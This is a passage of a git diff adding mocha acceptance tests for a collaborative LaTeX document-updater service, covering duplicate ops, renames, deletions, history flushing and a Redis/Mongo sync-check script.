doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + }) + + describe('when the sending duplicate ops', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + // One user delete 'one', the next turns it into 'once'. The second becomes a NOP. + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + meta: { + source: 'ikHceq3yfAdQYzBo4-xZ', + }, + }, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + dupIfSource: ['ikHceq3yfAdQYzBo4-xZ'], + meta: { + source: 'ikHceq3yfAdQYzBo4-xZ', + }, + }, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }, 200) + } + ) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should return a message about duplicate ops', function () { + this.messageCallback.calledTwice.should.equal(true) + this.messageCallback.args[0][0].should.equal('applied-ops') + expect(JSON.parse(this.messageCallback.args[0][1]).op.dup).to.be.undefined + this.messageCallback.args[1][0].should.equal('applied-ops') + expect(JSON.parse(this.messageCallback.args[1][1]).op.dup).to.equal(true) + }) + }) + + describe('when sending updates for a non-existing doc id', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + this.non_existing = { + doc_id: this.doc_id, + v: this.version, + op: [{ d: 'content', p: 0 }], + } + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.non_existing, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update or create a doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + done() + } + ) + }) + + it('should send a message with an error', function () { + this.messageCallback.called.should.equal(true) + const [channel, message] = this.messageCallback.args[0] + channel.should.equal('applied-ops') + JSON.parse(message).should.deep.include({ + project_id: this.project_id, + doc_id: this.doc_id, + error: `doc not not found: /project/${this.project_id}/doc/${this.doc_id}`, + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js b/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js new file mode 100644 index 0000000..9e825a4 --- /dev/null +++ b/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js @@ -0,0 +1,671 @@ +const sinon = require('sinon') +const Settings = require('@overleaf/settings') +const rclientProjectHistory = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const ProjectHistoryKeys = Settings.redis.project_history.key_schema + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe("Applying updates to a project's structure", function () { + before(function () { + this.user_id = 'user-id-123' + this.version = 1234 + }) + + describe('renaming a file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + newPathname: '/new-file-path', + } + this.updates = [this.fileUpdate] + DocUpdaterApp.ensureRunning(error => { + if (error) { + return done(error) + } + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + it('should push the applied file renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.file.should.equal(this.fileUpdate.id) + update.pathname.should.equal('/file-path') + update.new_pathname.should.equal('/new-file-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('deleting a file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + newPathname: '', + } + this.updates = [this.fileUpdate] + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied file renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.file.should.equal(this.fileUpdate.id) + update.pathname.should.equal('/file-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('renaming a document', function () { + before(function () { + this.update = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path', + newPathname: '/new-doc-path', + } + this.updates = [this.update] + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('/new-doc-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.update.id, {}) + DocUpdaterClient.preloadDoc(this.project_id, this.update.id, error => { + if (error) { + return done(error) + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.update.id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.pathname.should.equal(this.update.newPathname) + done() + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('/new-doc-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + }) + + describe('renaming multiple documents and files', function () { + before(function () { + this.docUpdate0 = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path0', + newPathname: '/new-doc-path0', + } + this.docUpdate1 = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path1', + newPathname: '/new-doc-path1', + } + this.fileUpdate0 = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path0', + newPathname: '/new-file-path0', + } + this.fileUpdate1 = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path1', + newPathname: '/new-file-path1', + } + this.updates = [ + this.docUpdate0, + this.docUpdate1, + this.fileUpdate0, + this.fileUpdate1, + ] + }) + + describe('when the documents are not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + let update = JSON.parse(updates[0]) + update.doc.should.equal(this.docUpdate0.id) + update.pathname.should.equal('/doc-path0') + update.new_pathname.should.equal('/new-doc-path0') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + update = JSON.parse(updates[1]) + update.doc.should.equal(this.docUpdate1.id) + update.pathname.should.equal('/doc-path1') + update.new_pathname.should.equal('/new-doc-path1') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.1`) + + update = JSON.parse(updates[2]) + update.file.should.equal(this.fileUpdate0.id) + update.pathname.should.equal('/file-path0') + update.new_pathname.should.equal('/new-file-path0') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.2`) + + update = JSON.parse(updates[3]) + update.file.should.equal(this.fileUpdate1.id) + update.pathname.should.equal('/file-path1') + update.new_pathname.should.equal('/new-file-path1') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.3`) + + done() + } + ) + }) + }) + }) + + describe('deleting a document', function () { + before(function () { + this.update = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path', + newPathname: '', + } + this.updates = [this.update] + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc update to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.update.id, {}) + DocUpdaterClient.preloadDoc(this.project_id, this.update.id, error => { + if (error) { + return done(error) + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should not modify the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.update.id, + (error, res, doc) => { + if (error) { + return done(error) + } + + doc.pathname.should.equal('/a/b/c.tex') // default pathname from MockWebApi + done() + } + ) + }) + + it('should push the applied doc update to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + }) + + describe('adding a file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'add-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + url: 'filestore.example.com', + } + this.updates = [this.fileUpdate] + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the file addition to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.file.should.equal(this.fileUpdate.id) + update.pathname.should.equal('/file-path') + update.url.should.equal('filestore.example.com') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('adding a doc', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.docUpdate = { + type: 'add-doc', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + docLines: 'a\nb', + } + this.updates = [this.docUpdate] + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the doc addition to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.docUpdate.id) + update.pathname.should.equal('/file-path') + update.docLines.should.equal('a\nb') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('with enough updates to flush to the history service', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.version0 = 12345 + this.version1 = this.version0 + 1 + const updates = [] + for (let v = 0; v <= 599; v++) { + // Should flush after 500 ops + updates.push({ + type: 'add-doc', + id: DocUpdaterClient.randomId(), + pathname: '/file-' + v, + docLines: 'a\nb', + }) + } + + sinon.spy(MockProjectHistoryApi, 'flushProject') + + // Send updates in chunks to causes multiple flushes + const projectId = this.project_id + const userId = this.project_id + DocUpdaterClient.sendProjectUpdate( + projectId, + userId, + updates.slice(0, 250), + this.version0, + function (error) { + if (error) { + return done(error) + } + DocUpdaterClient.sendProjectUpdate( + projectId, + userId, + updates.slice(250), + this.version1, + error => { + if (error) { + return done(error) + } + setTimeout(done, 2000) + } + ) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with too few updates to flush to the history service', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.version0 = 12345 + this.version1 = this.version0 + 1 + + const updates = [] + for (let v = 0; v <= 42; v++) { + // Should flush after 500 ops + updates.push({ + type: 'add-doc', + id: DocUpdaterClient.randomId(), + pathname: '/file-' + v, + docLines: 'a\nb', + }) + } + + sinon.spy(MockProjectHistoryApi, 'flushProject') + + // Send updates in chunks + const projectId = this.project_id + const userId = this.project_id + DocUpdaterClient.sendProjectUpdate( + projectId, + userId, + updates.slice(0, 10), + this.version0, + function (error) { + if (error) { + return done(error) + } + DocUpdaterClient.sendProjectUpdate( + projectId, + userId, + updates.slice(10), + this.version1, + error => { + if (error) { + return done(error) + } + setTimeout(done, 2000) + } + ) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + }) + + it('should not flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(false) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js b/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js new file mode 100644 index 0000000..ebbc015 --- /dev/null +++ b/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js @@ -0,0 +1,371 @@ +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') +const { promisify } = require('node:util') +const { exec } = require('node:child_process') +const { expect } = require('chai') +const Settings = require('@overleaf/settings') +const fs = require('node:fs') +const Path = require('node:path') +const MockDocstoreApi = require('./helpers/MockDocstoreApi') +const sinon = require('sinon') + +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) + +describe('CheckRedisMongoSyncState', function () { + beforeEach(function (done) { + DocUpdaterApp.ensureRunning(done) + }) + beforeEach(async function () { + await rclient.flushall() + }) + + let peekDocumentInDocstore + beforeEach(function () { + peekDocumentInDocstore = sinon.spy(MockDocstoreApi, 'peekDocument') + }) + afterEach(function () { + peekDocumentInDocstore.restore() + }) + + async function runScript(options) { + let result + try { + result = await promisify(exec)( + Object.entries(options) + .map(([key, value]) => `${key}=${value}`) + .concat(['node', 'scripts/check_redis_mongo_sync_state.js']) + .join(' ') + ) + } catch (error) { + // includes details like exit code, stdErr and stdOut + return error + } + result.code = 0 + return result + } + + describe('without projects', function () { + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 0 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + }) + + describe('with a project', function () { + let projectId, docId + beforeEach(function (done) { + projectId = DocUpdaterClient.randomId() + docId = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId, docId, done) + }) + + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + + expect(peekDocumentInDocstore).to.not.have.been.called + }) + + describe('with out of sync lines', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + }) + + describe('with out of sync ranges', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + ranges: { changes: ['FAKE CHANGE'] }, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + }) + + describe('with out of sync version', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 2, + }) + }) + + it('should detect the out of sync state', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + + it('should auto-fix the out of sync state', async function () { + const result = await runScript({ + AUTO_FIX_VERSION_MISMATCH: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + }) + + describe('with a project', function () { + let projectId2, docId2 + beforeEach(function (done) { + projectId2 = DocUpdaterClient.randomId() + docId2 = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId2, docId2, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId2, docId2, done) + }) + + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + + describe('with one out of sync', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect one project out of sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + }) + + it('should write differences to disk', async function () { + const FOLDER = '/tmp/folder' + await fs.promises.rm(FOLDER, { recursive: true, force: true }) + const result = await runScript({ + WRITE_CONTENT: 'true', + FOLDER, + }) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 1 projects with 1 out of sync docs' + ) + + const dir = Path.join(FOLDER, projectId, docId) + expect(await fs.promises.readdir(FOLDER)).to.deep.equal([projectId]) + expect(await fs.promises.readdir(dir)).to.deep.equal([ + 'mongo-snapshot.txt', + 'redis-snapshot.txt', + ]) + expect( + await fs.promises.readFile( + Path.join(dir, 'mongo-snapshot.txt'), + 'utf-8' + ) + ).to.equal('updated\nmongo\nlines') + expect( + await fs.promises.readFile( + Path.join(dir, 'redis-snapshot.txt'), + 'utf-8' + ) + ).to.equal('mongo\nlines') + }) + }) + + describe('with both out of sync', function () { + beforeEach(function () { + MockWebApi.insertDoc(projectId, docId, { + lines: ['updated', 'mongo', 'lines'], + version: 1, + }) + MockWebApi.insertDoc(projectId2, docId2, { + lines: ['updated2', 'mongo', 'lines'], + version: 1, + }) + }) + + it('should detect both projects out of sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(1) + expect(result.stdout).to.include('Processed 2 projects') + expect(result.stdout).to.include( + 'Found 2 projects with 2 out of sync docs' + ) + }) + }) + }) + }) + + describe('with more projects than the LIMIT', function () { + for (let i = 0; i < 20; i++) { + beforeEach(function (done) { + const projectId = DocUpdaterClient.randomId() + const docId = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId, docId, done) + }) + } + + it('should flag limit', async function () { + const result = await runScript({ LIMIT: '4' }) + expect(result.code).to.equal(2) + // A redis SCAN may return more than COUNT (aka LIMIT) entries. Match loosely. + expect(result.stdout).to.match(/Processed \d+ projects/) + expect(result.stderr).to.include( + 'Found too many un-flushed projects (LIMIT=4). Please fix the reported projects first, then try again.' + ) + }) + + it('should continue with auto-flush', async function () { + const result = await runScript({ + LIMIT: '4', + FLUSH_IN_SYNC_PROJECTS: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 20 projects') + }) + }) + + describe('with partially deleted doc', function () { + let projectId, docId + beforeEach(function (done) { + projectId = DocUpdaterClient.randomId() + docId = DocUpdaterClient.randomId() + MockWebApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + MockDocstoreApi.insertDoc(projectId, docId, { + lines: ['mongo', 'lines'], + version: 1, + }) + DocUpdaterClient.getDoc(projectId, docId, err => { + MockWebApi.clearDocs() + done(err) + }) + }) + describe('with only the file-tree entry deleted', function () { + it('should flag the partial deletion', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + `Found partially deleted doc ${docId} in project ${projectId}: use AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA=true to fix metadata` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + expect(MockDocstoreApi.getDoc(projectId, docId)).to.not.include({ + deleted: true, + name: 'c.tex', + }) + expect(peekDocumentInDocstore).to.have.been.called + }) + it('should autofix the partial deletion', async function () { + const result = await runScript({ + AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA: 'true', + }) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.include( + `Found partially deleted doc ${docId} in project ${projectId}: fixing metadata` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + + expect(MockDocstoreApi.getDoc(projectId, docId)).to.include({ + deleted: true, + name: 'c.tex', + }) + + const result2 = await runScript({}) + expect(result2.code).to.equal(0) + expect(result2.stdout).to.include('Processed 1 projects') + expect(result2.stdout).to.not.include( + `Found partially deleted doc ${docId} in project ${projectId}` + ) + expect(result2.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + }) + }) + describe('with docstore metadata updated', function () { + beforeEach(function (done) { + MockDocstoreApi.patchDocument( + projectId, + docId, + { + deleted: true, + deletedAt: new Date(), + name: 'c.tex', + }, + done + ) + }) + + it('should work when in sync', async function () { + const result = await runScript({}) + expect(result.code).to.equal(0) + expect(result.stdout).to.include('Processed 1 projects') + expect(result.stdout).to.not.include( + `Found partially deleted doc ${docId} in project ${projectId}` + ) + expect(result.stdout).to.include( + 'Found 0 projects with 0 out of sync docs' + ) + expect(peekDocumentInDocstore).to.have.been.called + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/DeletingADocumentTests.js b/services/document-updater/test/acceptance/js/DeletingADocumentTests.js new file mode 100644 index 0000000..24aef32 --- /dev/null +++ b/services/document-updater/test/acceptance/js/DeletingADocumentTests.js @@ -0,0 +1,174 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Deleting a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + + sinon.spy(MockProjectHistoryApi, 'flushProject') + DocUpdaterApp.ensureRunning(done) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.setDocument.restore() + MockWebApi.getDocument.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send the updated document and version to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.result, this.version + 1) + .should.equal(true) + }) + + it('should need to reload the doc if read again', function (done) { + MockWebApi.getDocument.resetHistory() + MockWebApi.getDocument.called.should.equals(false) + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + done() + } + ) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('when the doc is not in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockWebApi.setDocument.restore() + MockWebApi.getDocument.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not need to send the updated document to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should need to reload the doc if read again', function (done) { + MockWebApi.getDocument.called.should.equals(false) + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + done() + } + ) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/DeletingAProjectTests.js b/services/document-updater/test/acceptance/js/DeletingAProjectTests.js new file mode 100644 index 0000000..cca0b4d --- /dev/null +++ b/services/document-updater/test/acceptance/js/DeletingAProjectTests.js @@ -0,0 +1,357 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const async = require('async') + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const 